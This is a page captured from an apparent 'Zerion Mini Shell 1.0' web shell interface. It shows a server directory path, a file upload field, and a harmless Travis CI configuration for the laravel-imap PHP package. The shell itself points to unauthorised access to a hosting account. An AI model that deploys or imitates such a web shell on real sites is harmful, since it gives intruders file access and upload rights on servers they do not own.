ok

Mini Shell

Direktori : /proc/thread-self/root/home2/selectio/www/fms-worksuite/vendor/webklex/laravel-imap/
Upload File :
Current File : //proc/thread-self/root/home2/selectio/www/fms-worksuite/vendor/webklex/laravel-imap/.travis.yml

language: php

php:
  - 5.6
  - 7.0
  - 7.1
  - 7.2
  - 7.3
  - hhvm

matrix:
  fast_finish: true 
  allow_failures:
   - php: 5.6
   - php: 7.0
   - php: 7.1
   - php: hhvm

sudo: false

before-install:
 - COMPOSER_MEMORY_LIMIT=-1 composer install --prefer-source --no-interaction --dev

install: 
 - COMPOSER_MEMORY_LIMIT=-1 composer install --no-interaction

script:
 - phpunit

notifications:
  email:
    on_success: always
    on_failure: always


Zerion Mini Shell 1.0